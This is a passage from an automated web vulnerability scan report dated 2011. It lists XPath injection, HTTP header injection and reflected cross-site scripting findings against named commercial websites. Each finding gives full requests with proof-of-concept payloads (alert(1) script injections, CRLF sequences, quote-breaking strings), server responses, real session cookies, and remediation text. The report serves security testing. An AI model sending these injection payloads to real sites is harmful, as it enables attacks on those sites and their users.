Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:01:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11034

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.8. http://community.petco.com/n/pfx/forum.aspx [config parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.petco.com
Path:   /n/pfx/forum.aspx

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /n/pfx/forum.aspx?webtag=fd03p00v01d1&widgetId=PTWidget2&pttv=2&nav=widget&config=recentDiscussions0001'&includeCSS=false&cdsn=568 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:01:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

4. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload e5eb5%0d%0abd0c019c16 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=e5eb5%0d%0abd0c019c16&va=1&e=30d HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ForrentCriteo=1; NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e5eb5
bd0c019c16
=1; expires=Wed, 15-Jun-11 02:02:03 GMT; path=/; domain=.traderonline.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


4.2. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [va parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 79b52%0d%0abc60156776a was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=ForrentCriteo&va=79b52%0d%0abc60156776a&e=30d HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ForrentCriteo=1; NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: ForrentCriteo=79b52
bc60156776a
; expires=Wed, 15-Jun-11 02:02:10 GMT; path=/; domain=.traderonline.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


5. Cross-site scripting (reflected)
There are 76 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 19f96<script>alert(1)</script>8320cd70653 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/68433919f96<script>alert(1)</script>8320cd70653?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 16 May 2011 01:57:59 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/68433919f96<script>alert(1)</script>8320cd70653

5.2. http://buy.travelguard.com/TGI2/proc/stateselector.aspx [br parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /TGI2/proc/stateselector.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c35a'%3balert(1)//bd29db8f83c was submitted in the br parameter. This input was echoed as 9c35a';alert(1)//bd29db8f83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a'%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:40:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   State Selector
</title><link hre
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect9c35a';alert(1)//bd29db8f83c;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.3. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/proc/error.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e96a0'%3balert(1)//af8feb44cf2 was submitted in the br parameter. This input was echoed as e96a0';alert(1)//af8feb44cf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/proc/error.aspx?pcode=MYTG&br=e96a0'%3balert(1)//af8feb44cf2&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329&st=1&cn=1&errorID=uh HTTP/1.1
Host: buy.travelguard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%3B%20SC_LINKS%3Dundefined%253A/TGI2/proc/stateselector.aspx%255E%255E/tgi2/app_themes/default/img/buttons/continue.gif%255E%255Eundefined%253A/TGI2/proc/stateselector.aspx%2520%257C%2520/tgi2/app_themes/default/img/buttons/continue.gif%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dundefined%2525253A/TGI2/proc/stateselector.aspx%252526pidt%25253D1%252526oid%25253Djavascript%2525253AWebForm_DoPostBackWithOptions%25252528new%2525252520WebForm_PostBackOptions%25252528%25252522ctl00%25252524ctl00%25252524purchasePathCont%252526ot%25253DA%3B; s_pers=%20s_depth%3D2%7C1305546099515%3B%20gpv_pageName%3Dundefined%253A/TGI2/proc/stateselector.aspx%7C1305546114553%3B%20s_pers_prop21%3D000329%7C1463224314554%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:12:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Error Page
</title><link href="/
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=e96a0';alert(1)//af8feb44cf2;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.4. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/proc/error.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript rest-of-line comment. The payload 7a27f%0aalert(1)//47046b6433b was submitted in the br parameter. This input was echoed as 7a27f
alert(1)//47046b6433b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/proc/error.aspx?pcode=MYTG&br=tgdirect9c35a%27;alert(1)//bd29db8f83c7a27f%0aalert(1)//47046b6433b&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329&st=1&cn=1&errorID=uh HTTP/1.1
Host: buy.travelguard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%3B%20SC_LINKS%3Dundefined%253A/TGI2/proc/stateselector.aspx%255E%255E/tgi2/app_themes/default/img/buttons/continue.gif%255E%255Eundefined%253A/TGI2/proc/stateselector.aspx%2520%257C%2520/tgi2/app_themes/default/img/buttons/continue.gif%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dundefined%2525253A/TGI2/proc/stateselector.aspx%252526pidt%25253D1%252526oid%25253Djavascript%2525253AWebForm_DoPostBackWithOptions%25252528new%2525252520WebForm_PostBackOptions%25252528%25252522ctl00%25252524ctl00%25252524purchasePathCont%252526ot%25253DA%3B; s_pers=%20s_depth%3D2%7C1305546099515%3B%20gpv_pageName%3Dundefined%253A/TGI2/proc/stateselector.aspx%7C1305546114553%3B%20s_pers_prop21%3D000329%7C1463224314554%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:12:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Error Page
</title><link href="/
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect9c35a';alert(1)//bd29db8f83c7a27f
alert(1)//47046b6433b
;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.5. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e0dc'%3balert(1)//3841c1206 was submitted in the u parameter. This input was echoed as 7e0dc';alert(1)//3841c1206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=7e0dc'%3balert(1)//3841c1206 HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7Czrdrej4AXZ8pDrsX0VgpEAStDpKdrJ%2Bjt8TcUQh7JEOS2lpVt46GDr7rvlDUY4fj1zvpyDAc48qo6uZg9V7WVnv%2BrAVuXj2fOo72VUX75CXKS64EYxHT95mYYbhrAVqhPvHaTa5e8RxWCFR9XVY0qBe5iz2LQAMXuiv67NNUR5gxgPgYkDS3NnLsO3iBknvJqxJ21wxzPKXpQVnxSmYLM4l4T8thhKB4P%2FB1jXyYokWXN2dthtJxpxLl3VAiZ10BJwG2%2BUx2Wpqu7FF82cSnA%2FJ351T5nkuzQp36SjNgpw4%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1242
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split('/')[2]){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=0&u=7e0dc';alert(1)//3841c1206';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

5.6. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70ad5</script><script>alert(1)</script>8c901f57b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8&70ad5</script><script>alert(1)</script>8c901f57b91=1 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xiknzn45ckbuvem4qyncebea; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=1c05d1d2-b665-4a52-bb90-2eb367a590e1; expires=Wed, 15-Jun-2011 10:23:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:23:18 GMT
Content-Length: 40309

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...
<!--
jvurlargs = '?c=qlZ9Vfw8&70ad5</script><script>alert(1)</script>8c901f57b91=1';
jvurlargsclean = '?c=qlZ9Vfw8&70ad5</script>
...[SNIP]...

5.7. http://html.aggregateknowledge.com/iframe [wid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The value of the wid request parameter is copied into the HTML document as plain text between tags. The payload 6503c<x%20style%3dx%3aexpression(alert(1))>bcab1aa82a was submitted in the wid parameter. This input was echoed as 6503c<x style=x:expression(alert(1))>bcab1aa82a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /iframe?wid=26503c<x%20style%3dx%3aexpression(alert(1))>bcab1aa82a&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp&senduuid=0 HTTP/1.1
Host: html.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=801458892474636324; u=5|0AQBbQQcAAAAAAAEAAQEAgA%3D%3D

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:30 GMT
Connection: close


<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
java.lang.IllegalArgumentException: Could not convert "26503c<x style=x:expression(alert(1))>bcab1aa82a" to int / long.
   at net.agkn.module.common.parameter.ParameterDefinition.castSingleValue(ParameterDefinition.java:259)
   at net.agkn.module.common.parameter.ParameterDefinition.castValue(ParameterDefin
...[SNIP]...

5.8. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/AC_close_052110

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19ce4<img%20src%3da%20onerror%3dalert(1)>61e2893ba50 was submitted in the REST URL parameter 4. This input was echoed as 19ce4<img src=a onerror=alert(1)>61e2893ba50 in the application's response.

